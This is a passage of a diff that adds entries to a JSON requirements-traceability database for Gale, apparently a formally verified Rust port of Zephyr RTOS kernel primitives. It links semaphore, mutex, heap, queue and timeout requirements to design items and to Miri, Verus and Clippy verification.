+      "description": "Contains the struct k_sem definition (line 3607) and inline k_sem_count_get function.  The struct has wait_q, count, limit as core fields; poll_events and obj_core are config-dependent and out of scope for Gale.\n",
+      "id": "PROV-SEM-002",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "sem",
+        "kernel",
+        "header"
+      ],
+      "title": "Zephyr include/zephyr/kernel.h — struct k_sem definition",
+      "type": "source-provenance"
+    },
+    {
+      "description": "The spinlock validation layer of Zephyr's spinlock. Contains z_spin_lock_valid, z_spin_unlock_valid, z_spin_lock_set_owner. The Gale port models ownership and nesting discipline only — hardware atomics stay in C.\n",
+      "id": "PROV-SL-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "spinlock",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/spinlock_validate.c — spinlock validation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "When post is called with a bitmask, the event's current value is updated to the bitwise OR of the current value and the posted bits.\n",
+      "id": "SWREQ-EV-EV01",
+      "links": [
+        {
+          "target": "SYSREQ-EV-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-EV-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "event",
+        "post",
+        "asil-d"
+      ],
+      "title": "EV1: post ORs bits",
+      "type": "sw-req"
+    },
+    {
+      "description": "When clear is called with a bitmask, the event's current value is updated to the bitwise AND of the current value and the complement of the clear mask.\n",
+      "id": "SWREQ-EV-EV03",
+      "links": [
+        {
+          "target": "SYSREQ-EV-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "event",
+        "clear",
+        "asil-d"
+      ],
+      "title": "EV3: clear ANDs complement",
+      "type": "sw-req"
+    },
+    {
+      "description": "For each ASIL-D property, establish that the specification is independently correct — not merely a transcription of C behavior.\nApproach: 1. **Mathematical foundation**: Each spec should trace to a textbook\n   definition (e.g., counting semaphore from Dijkstra 1965, mutex from\n   Lampson/Redell 1980) or an industry standard (POSIX, AUTOSAR OS).\n2. **Differential testing**: Run the same property-based tests against\n   multiple implementations (Zephyr C, Gale Rust, FreeRTOS, seL4) to\n   detect spec bugs that pass one implementation but fail another.\n3. **Independent review**: Specs should be reviewed by domain experts\n   who did NOT write the Rust code, to catch confirmation bias.\n\nThis addresses the \"replicated bug\" risk from FIND-002.\n",
+      "id": "REQ-TRACTOR-003",
+      "links": [
+        {
+          "target": "SYSREQ-TRACTOR-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "FIND-002",
+          "type": "traces-to"
+        },
+        {
+          "target": "FIND-001",
+          "type": "traces-to"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "specification",
+        "independence",
+        "safety",
+        "audit"
+      ],
+      "title": "Specification independence: verify specs are mathematically sound",
+      "type": "sw-req"
+    },
+    {
+      "description": "Full condvar test suite run under Miri to detect undefined behavior, use-after-free, out-of-bounds access, and uninitialized memory reads.\n",
+      "id": "UV-CV-004",
+      "links": [
+        {
+          "target": "SWDD-CV-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-CV-SIGNAL",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-CV-BROADCAST",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-CV-WAIT",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "miri",
+        "safety",
+        "swe-4"
+      ],
+      "title": "CondVar Miri undefined behavior detection",
+      "type": "unit-verification"
+    },
+    {
+      "description": "The fundamental mutex invariant: the lock count is positive if and only if the mutex has an owner.  This must hold after init, lock, unlock, and any interleaving of operations.\n",
+      "id": "SWREQ-MUT-M01",
+      "links": [
+        {
+          "target": "SYSREQ-MUT-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mutex",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "M1: lock_count > 0 iff owner.is_some() (always)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The formally verified ZMS implementation shall not increase FLASH usage by more than 10% compared to the equivalent Zephyr C ZMS implementation for the same test application.\n",
+      "id": "SYSREQ-ZMS-006",
+      "links": [
+        {
+          "target": "STKH-ZMS-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "storage",
+        "performance",
+        "binary-size",
+        "zms"
+      ],
+      "title": "Binary size overhead within 10%",
+      "type": "system-req"
+    },
+    {
+      "description": "When the pool is full (allocated == capacity), alloc returns ENOMEM without modifying state.\n",
+      "id": "SWREQ-MP-MP03",
+      "links": [
+        {
+          "target": "SYSREQ-MP-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MP-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mempool",
+        "alloc",
+        "asil-d"
+      ],
+      "title": "MP3: alloc when full returns ENOMEM",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS mutex shall provide priority inheritance to prevent priority inversion, ensuring the mutex owner temporarily inherits the priority of the highest-priority waiting thread.\n",
+      "id": "ZEP-SRS-MUT-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-MUT",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-MUT-M08",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-MUT-M11",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "mutex"
+      ],
+      "title": "Zephyr: Mutex Priority Inheritance",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Insert thread into the wait queue maintaining priority order (lowest numeric value = highest priority comes first). Returns false if queue is full (MAX_WAITERS = 64).\n",
+      "id": "SWDD-WQ-PEND",
+      "links": [
+        {
+          "target": "SWARCH-WQ-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SEM-P10",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "wait-queue",
+        "pend"
+      ],
+      "title": "WaitQueue::pend — sorted insert by priority",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "If unlocked (owner is None): set owner=current_id, lock_count=1, return Acquired. If owner matches current_id: reentrant lock, lock_count+=1, return Acquired. If owned by another thread: return WouldBlock.\n",
+      "id": "SWDD-MUT-LOCK",
+      "links": [
+        {
+          "target": "SWARCH-MUT-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MUT-M03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MUT-M04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-MUT-M05",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MUT-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mutex",
+        "lock"
+      ],
+      "title": "Mutex::try_lock — z_impl_k_mutex_lock non-blocking port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "The Zephyr RTOS shall increment the semaphore's count upon release.\n",
+      "id": "ZEP-SRS-5-13",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Semaphore release",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The system shall implement a work queue subsystem for deferred execution of work items in thread context.\n",
+      "id": "ZEP-SYRS-WK",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "work"
+      ],
+      "title": "Zephyr: Work Queue",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Integration tests in tests/timeslice_integration.rs exercising the full timeslice API surface across module boundaries. Tests slice duration selection, eligibility filtering, reset/re-arm cycles, expiry-triggered rotation, and global config update propagation.\n",
+      "id": "IV-TS-001",
+      "links": [
+        {
+          "target": "SWARCH-TS-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Timeslice integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "When alloc is called and num_used >= num_blocks, returns ENOMEM without modifying the slab state.\n",
+      "id": "SWREQ-MS-MS05",
+      "links": [
+        {
+          "target": "SYSREQ-MS-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MS-2",
+          "type": "satisfies"
+        },
+        {
+          "target": "ZEP-SRS-MS-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-slab",
+        "alloc",
+        "error",
+        "asil-d"
+      ],
+      "title": "MS5: alloc full returns ENOMEM",
+      "type": "sw-req"
+    },
+    {
+      "description": "A LIFO stack that matches the Zephyr k_stack API semantics: initialization with capacity, push (increment), and pop (decrement). Must maintain count/capacity bounds and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-SK-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-SK",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack",
+        "kernel"
+      ],
+      "title": "LIFO stack with push/pop semantics",
+      "type": "system-req"
+    },
+    {
+      "description": "Stack geometry validation from Zephyr's thread creation. Contains setup_thread_stack (lines 383-470) including K_THREAD_STACK_LEN, K_THREAD_STACK_BUFFER, K_THREAD_STACK_RESERVED, and STACK_SENTINEL checks. The Gale port models stack geometry validation only.\n",
+      "id": "PROV-SKS-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "stack-config",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/thread.c — thread stack setup",
+      "type": "source-provenance"
+    },
+    {
+      "description": "Advance curr_tick by ticks. Fire all timeouts whose expiry <= curr_tick in ascending order.\n",
+      "id": "SWDD-TO-ANNOUNCE",
+      "links": [
+        {
+          "target": "SWARCH-TO-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-TO-TO03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TO-TO04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TO-TO05",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TO-TO06",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TO-TO08",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-TO-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeout",
+        "announce"
+      ],
+      "title": "TimeoutList::announce — sys_clock_announce port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Run full test suite under Miri to detect undefined behavior, use-after-free, out-of-bounds access, and uninitialized memory reads. Executed via: cargo +nightly miri test\n",
+      "id": "UV-SEM-004",
+      "links": [
+        {
+          "target": "SWDD-SEM-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SEM-GIVE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SEM-TRY-TAKE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SEM-RESET",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "miri",
+        "safety",
+        "swe-4"
+      ],
+      "title": "Miri undefined behavior detection",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Integration tests exercising alloc-free roundtrips and pool capacity management.\n",
+      "id": "IV-DY-001",
+      "links": [
+        {
+          "target": "SWARCH-DY-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Dynamic integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Zephyr kernel atomic operations test suite executed on qemu_cortex_m3. Validates atomic_set, atomic_get, atomic_add, atomic_cas, and all atomic variants for correctness and absence of data races. Test suite: zephyr/tests/kernel/atomic.\n",
+      "id": "SV-AT-001",
+      "links": [
+        {
+          "target": "SYSREQ-AT-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Atomic Operations Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Validate double-free and underflow, then return bytes to pool. C source: lib/heap/heap.c lines 166-201.\n",
+      "id": "SWDD-HP-FREE",
+      "links": [
+        {
+          "target": "SWARCH-HP-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-HP-HP04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-HP-HP05",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-HP-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "heap",
+        "free"
+      ],
+      "title": "Heap::free — sys_heap_free port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Decision tree: production mode: panic -> Halt, ISR non-stack -> Halt, thread -> AbortThread, stack_check -> AbortThread. Test mode: ISR -> Ignore (except stack -> AbortThread), thread -> AbortThread. C source: kernel/fatal.c lines 85-179.\n",
+      "id": "SWDD-FT-CLASSIFY",
+      "links": [
+        {
+          "target": "SWARCH-FT-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-FT-FT02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-FT-FT03",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-FT-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fatal",
+        "classify"
+      ],
+      "title": "FatalError::classify — z_fatal_error port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "The Zephyr RTOS shall manage a bounded pool of thread stacks, enforcing the invariant that the number of active dynamic threads never exceeds the pool maximum.\n",
+      "id": "ZEP-SRS-DY-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-DY",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-DY-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "dynamic"
+      ],
+      "title": "Zephyr: Dynamic Thread Stack Pool Management",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Integration tests in tests/futex_integration.rs exercising the full futex API surface across module boundaries. Tests wait/wake sequences, val-mismatch early return, wake-one vs wake-all, woken count accuracy, and stress cycles.\n",
+      "id": "IV-FX-001",
+      "links": [
+        {
+          "target": "SWARCH-FX-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Futex integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "The CRC8 polynomial used for ATE integrity checking detects all single-bit errors in the protected byte range.  For any valid ATE with correct CRC, flipping any single bit in the header or data fields produces a CRC mismatch.\n",
+      "id": "SWREQ-ZMS-P02",
+      "links": [
+        {
+          "target": "SYSREQ-ZMS-004",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zms",
+        "crc",
+        "integrity",
+        "asil-d"
+      ],
+      "title": "P2: ATE CRC8 detects all single-bit errors",
+      "type": "sw-req"
+    },
+    {
+      "description": "Zephyr's _wait_q_t is a doubly-linked sorted list used by all blocking kernel objects.  The Gale port replaces the linked-list implementation with a heapless::Vec<Thread, 64> sorted array, preserving identical priority ordering semantics. The original is spread across multiple headers and kernel internals (include/zephyr/kernel_structs.h, kernel/include/wait_q.h).\n",
+      "id": "PROV-WQ-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "wait-queue",
+        "kernel"
+      ],
+      "title": "Zephyr kernel wait_q — priority-ordered wait queue",
+      "type": "source-provenance"
+    },
+    {
+      "description": "The Zephyr RTOS shall enforce that the number of allocated blocks never exceeds the configured pool capacity, maintaining the invariant 0 <= num_used <= num_blocks.\n",
+      "id": "ZEP-SRS-MS-3",
+      "links": [
+        {
+          "target": "ZEP-SYRS-MS",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-MS-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "mem-slab"
+      ],
+      "title": "Zephyr: Memory Slab Bounded Pool",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The system shall implement a pipe synchronization primitive for byte-stream data transfer between threads.\n",
+      "id": "ZEP-SYRS-PP",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "pipe"
+      ],
+      "title": "Zephyr: Pipe",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The system shall implement SMP CPU lifecycle management with global lock coordination for multi-processor operation.\n",
+      "id": "ZEP-SYRS-SM",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "smp"
+      ],
+      "title": "Zephyr: SMP CPU Management",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Full Zephyr kernel work queue test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_WORKQ=y. Tests exercise k_work_submit, k_work_schedule, k_work_cancel, and work queue lifecycle through the Gale FFI/C shim layer. Test suite: zephyr/tests/kernel/workq/work_queue.\n",
+      "id": "SV-WK-001",
+      "links": [
+        {
+          "target": "SYSREQ-WK-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Work Queue Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Unit tests in plain/src/futex.rs covering wait val-match blocking, wait val-mismatch EAGAIN, wake-one, wake-all, woken count return, and empty-wake boundary condition.\n",
+      "id": "UV-FX-001",
+      "links": [
+        {
+          "target": "SWDD-FX-WAIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-FX-WAKE",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "unit",
+        "swe-4"
+      ],
+      "title": "Futex unit tests (cargo test --lib)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a mechanism to define and initialize a semaphore at runtime.\n",
+      "id": "ZEP-SRS-5-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-14",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "semaphore"
+      ],
+      "title": "Zephyr: Counting Semaphore Definition At Run Time",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "A transmit message matches a receive message only if the tx target is K_ANY or equals the receiver thread, AND the rx source is K_ANY or equals the sender thread. Maps to mailbox.c:112-153.\n",
+      "id": "SWREQ-MB-MB03",
+      "links": [
+        {
+          "target": "SYSREQ-MB-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MB-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mbox",
+        "matching",
+        "asil-d"
+      ],
+      "title": "MB3: message match requires compatible thread IDs",
+      "type": "sw-req"
+    },
+    {
+      "description": "Hardware-accurate Renode emulation target for Cortex-R5 (ARMv7-R real-time profile) validation.  Uses the qemu_cortex_r5 Zephyr board with Renode's zynqmp_zephyr.resc script which loads the ZynqMP platform, halts A53 APU cores, and enables RPU core 0. Confirms Gale functions on the real-time profile architecture used in safety-critical automotive (Xilinx ZynqMP) deployments.\n",
+      "id": "SWARCH-TGT-004",
+      "links": [
+        {
+          "target": "SWREQ-SEM-P01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-KILN-003",
+          "type": "enables"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "test-target",
+        "renode",
+        "cortex-r5",
+        "zynqmp"
+      ],
+      "title": "Renode emulation target — ZynqMP RPU (Cortex-R5)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Integration tests exercising stack configuration validation across module boundaries.\n",
+      "id": "IV-SKS-001",
+      "links": [
+        {
+          "target": "SWARCH-SKS-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "StackConfig integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "No arithmetic operation on count or limit causes integer overflow or underflow.  Give at limit saturates; take at 0 returns error. The C code uses (count != limit) ? 1U : 0U pattern (line 110). Gale uses checked_add/saturating_sub.\n",
+      "id": "SWREQ-SEM-P09",
+      "links": [
+        {
+          "target": "SYSREQ-SEM-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sem",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "P9: no arithmetic overflow in any operation",
+      "type": "sw-req"
+    },
+    {
+      "description": "When get is called and count == 0, returns ENOENT without modifying the queue state. Maps to queue.c:335-370.\n",
+      "id": "SWREQ-FI-FI04",
+      "links": [
+        {
+          "target": "SYSREQ-FI-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-FI-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fifo",
+        "get",
+        "error",
+        "asil-d"
+      ],
+      "title": "FI4: get when empty returns ENOENT, state unchanged",
+      "type": "sw-req"
+    },
+    {
+      "description": "Validate capacity > 0 (return Err(EINVAL) if zero). Set count = 0.\n",
+      "id": "SWDD-SK-INIT",
+      "links": [
+        {
+          "target": "SWARCH-SK-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-SK-SK01",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-SK-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack",
+        "init"
+      ],
+      "title": "Stack::init — k_stack_init port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Integration tests exercising grant-revoke roundtrips, validate with various init/perm/type combinations, and recycle lifecycle.\n",
+      "id": "IV-US-001",
+      "links": [
+        {
+          "target": "SWARCH-US-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Userspace integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Message queue ring buffer index model. Models read_idx/write_idx/used_msgs arithmetic for FIFO message passing with fixed-size messages. Actual data copy stays in C — Gale verifies index safety only. No unsafe code.\n",
+      "id": "SWARCH-MQ-001",
+      "links": [
+        {
+          "target": "SWREQ-MQ-MQ01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-MQ-MQ02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-MQ-MQ05",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-MQ-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "architecture"
+      ],
+      "title": "MsgQ module (gale::msgq)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "The Zephyr RTOS shall exempt cooperative-priority threads (priority < 0) from time-slice preemption, allowing them to run until they voluntarily yield or block.\n",
+      "id": "ZEP-SRS-TS-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-TS",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-TS-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "timeslice"
+      ],
+      "title": "Zephyr: Cooperative Thread Exemption from Timeslicing",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Attempt allocation; if NULL and timeout != K_NO_WAIT, pend on wait queue and retry loop. Return pointer or NULL on timeout. C source: kernel/kheap.c lines 79-129.\n",
+      "id": "SWDD-KH-ALLOC",
+      "links": [
+        {
+          "target": "SWARCH-KH-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-KH-KH02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-KH-KH03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-KH-KH06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-KH-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "kheap",
+        "alloc",
+        "blocking"
+      ],
+      "title": "KHeap::alloc — k_heap_alloc / z_heap_alloc_helper port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "The semaphore count is always between 0 and limit inclusive. This is the fundamental invariant — it must hold after init, give, take, reset, and any interleaving of operations.\n",
+      "id": "SWREQ-SEM-P01",
+      "links": [
+        {
+          "target": "SYSREQ-SEM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-5-1",
+          "type": "satisfies"
+        },
+        {
+          "target": "ZEP-SRS-5-2",
+          "type": "satisfies"
+        },
+        {
+          "target": "ZEP-SRS-5-3",
+          "type": "satisfies"
+        },
+        {
+          "target": "ZEP-SRS-5-4",
+          "type": "satisfies"
+        },
+        {
+          "target": "ZEP-SRS-5-5",
+          "type": "satisfies"
+        },
+        {
+          "target": "ZEP-SRS-5-15",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sem",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "P1: 0 <= count <= limit (always)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The stack size must be a multiple of the required alignment. Enforced by validate() rejecting size % alignment != 0.\n",
+      "id": "SWREQ-SKS-SK01",
+      "links": [
+        {
+          "target": "SYSREQ-SKS-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack-config",
+        "alignment",
+        "asil-d"
+      ],
+      "title": "SK_S1: size is aligned to alignment",
+      "type": "sw-req"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all timer code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-TM-003",
+      "links": [
+        {
+          "target": "SWREQ-TM-TM01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Timer Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Transition event state to the specified ready state value.\n",
+      "id": "SWDD-PL-SET-READY",
+      "links": [
+        {
+          "target": "SWARCH-PL-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-PL-PL03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-PL-PL07",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-PL-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "poll",
+        "ready"
+      ],
+      "title": "PollEvent::set_ready — set_event_ready port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Integration tests exercising the full heap API surface across module boundaries including compositional alloc/free/split/merge sequences.\n",
+      "id": "IV-HP-001",
+      "links": [
+        {
+          "target": "SWARCH-HP-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Heap integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "The Zephyr RTOS mutex lock shall block the calling thread with a timeout when the mutex is held by another thread, or return -EBUSY immediately when called with K_NO_WAIT.\n",
+      "id": "ZEP-SRS-MUT-3",
+      "links": [
+        {
+          "target": "ZEP-SYRS-MUT",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-MUT-M03",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-MUT-M05",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "mutex"
+      ],
+      "title": "Zephyr: Mutex Lock With Timeout",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all device_init code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-DI-003",
+      "links": [
+        {
+          "target": "SWREQ-DI-DI01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "DeviceInit Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Verus specifications in src/condvar.rs with requires/ensures clauses that formally verify all condvar properties (C01-C08) via SMT solving. Proves absence of panics and invariant violations. Includes proof lemmas for init clean state, signal-broadcast equivalence, and broadcast idempotency. Executed via: bazel test //:verus_test\n",
+      "id": "FV-CV-001",
+      "links": [
+        {
+          "target": "SWREQ-CV-C01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-CV-C02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-CV-C03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-CV-C04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-CV-C05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-CV-C06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-CV-C07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-CV-C08",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "CondVar Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "k_heap_init initializes the wait queue, resets the spinlock, and delegates to sys_heap_init for the backing memory region. Maps to kheap.c:26-33.\n",
+      "id": "SWREQ-KH-KH01",
+      "links": [
+        {
+          "target": "SYSREQ-KH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-KH-1",
+          "type": "satisfies"
+        }
+      ],
